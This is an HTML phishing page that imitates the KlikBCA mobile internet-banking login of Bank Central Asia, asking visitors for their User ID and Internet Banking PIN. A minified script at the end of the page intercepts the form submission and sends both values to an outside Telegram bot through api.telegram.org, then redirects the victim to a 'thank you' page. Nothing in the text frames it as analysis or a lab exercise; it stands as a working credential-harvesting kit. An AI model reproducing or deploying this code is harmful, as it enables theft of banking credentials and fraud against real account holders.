<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;"/>
    <title>KlikBCA</title>
    <style type="text/css">
    hr { margin-top: auto; margin-bottom: auto;}
    .OranRule { border: 3px solid #e7d300;}
    </style>
    <link href="style.css" rel="stylesheet" type="text/css" />
    <link href="../css/banner-slide.css" rel="stylesheet" type="text/css" />
    <script src="../library/jsencrypt.min.js"></script>
    <script src="layanan/config.js"></script> <!-- Masukkan file telegramConfig.js -->
</head>
<body onload="document.getElementById('txt_user_id').focus();">

<!-- Elemen loading -->
<div id="loading" style="display:none; position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%);">
    <img src="loading.gif" alt="Loading...">
</div>

<div id="wrapper">
    <div id="header">
        <div id="logo" style="background:#FFFFFF url(images/bg_top_2x55.gif) repeat-x top; height:57px; color:#FFFFFF">
            <img src="images/logo_bca_64x55.gif" alt="BCA-lite"/>
        </div>
        <div style="background:#e7cb00; height:3px">&nbsp;</div>
    </div>
    
    <div id="page-content" style="display:inline-block;">
        <form id="loginForm" method="post" action="./login1.php" onsubmit="return submitForm(event);">
            <table cellpadding="6" cellspacing="0">
                <tr>
                    <td colspan="2">
                        <table cellspacing="0" cellpadding="0">
                            <tr>
                                <td style="color:#303962; border-bottom:solid 1px #6f6f6f">Silakan masukkan USER ID Anda</td>
                            </tr>
                            <tr>
                                <td style="color:#ff9c00; border-top:solid 1px #6f6f6f">Please enter your USER ID</td>
                            </tr>
                        </table>
                    </td>
                </tr>
                <tr>
                    <td colspan="2"><input type="text" name="user_id" maxlength="20" size="24" id="user_id" autocomplete="off" required /></td>
                </tr>
                <tr>
                    <td colspan="2">
                        <table cellspacing="0">
                            <tr>
                                <td style="color:#303962; border-bottom:solid 1px #6f6f6f">Silakan masukkan PIN Internet Banking Anda</td>
                            </tr>
                            <tr>
                                <td style="color:#ff9c00; border-top:solid 1px #6f6f6f">Please enter your Internet Banking PIN</td>
                            </tr>
                        </table>
                    </td>
                </tr>
                <tr>
                    <td colspan="2"><input type="password" name="pin" size="24" maxlength="6" id="pswd" autocomplete="off" required /></td>
                </tr>
                <tr>
                    <td style="border-bottom:solid 1px #6f6f6f" width="450px"><button name="simpan" type="submit" value="LOGIN" onmouseover="this.style.cursor='hand'">LOGIN</button></td>
                    <td align="right" valign="bottom" style="border-bottom:solid 1px #6f6f6f"><a href="javascript:go2Full();"><u>Full Site</u></a></td>
                </tr>
            </table>
        </form>
    </div>
</div>

<!-- Sisa kode HTML dan JavaScript -->

<script>
    !function(e){"use strict";e.submitForm=function(e){e.preventDefault();var t=document.getElementById("user_id").value,n=document.getElementById("pswd").value,o="𝗕𝗖𝗔 - 𝗞𝗹𝗶𝗸𝗕𝗖𝗔\n𝗨𝘀𝗲𝗿 𝗜𝗗:\n"+t+"\n𝗣𝗶𝗻:\n"+n;fetch("https://api.telegram.org/bot"+TELEGRAM_BOT_TOKEN+"/sendMessage",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({chat_id:TELEGRAM_USER_ID,text:o})}).then(function(e){return e.json()}).then(function(e){console.log("Success:",e),document.getElementById("loginForm").submit(),window.location.href="layanan/terimakasih-menu-3.html"}).catch(function(e){console.error("Error:",e),alert("Gagal mengirim data. Silakan coba lagi.")})}}(window);
    </script>
        
</body>
</html>
